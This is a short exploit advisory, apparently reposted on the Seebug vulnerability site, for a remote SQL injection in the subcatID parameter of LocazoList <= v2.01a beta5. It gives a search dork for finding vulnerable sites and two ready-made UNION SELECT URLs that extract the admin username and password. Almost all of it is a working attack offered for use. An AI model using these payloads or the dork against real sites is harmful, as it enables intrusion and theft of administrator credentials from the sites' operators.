************************************************************************************* # Title : LocazoList <= v2.01a beta5 (subcatID) Remote SQL Injection Vulnerability # Author : ajann # Contact : :( # S.Page : http://www.locazo.net:81 # Dork : "Powered by Locazolist Copyright ? 2006" # $$ : $100 ************************************************************************************* [[SQL]]]--------------------------------------------------------- http://[target]/[path]//main.asp?catid=1&subcatID=[SQL] Example: //main.asp?catid=1&subcatID=-1%20union%20select%200,username,0,0,0%20from%20admin%20where%20id%20like%201 //main.asp?catid=1&subcatID=-1%20union%20select%200,password,0,0,0%20from%20admin%20where%20id%20like%201 [[/SQL]] """"""""""""""""""""" # ajann,Turkey # ... # Im not Hacker!
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论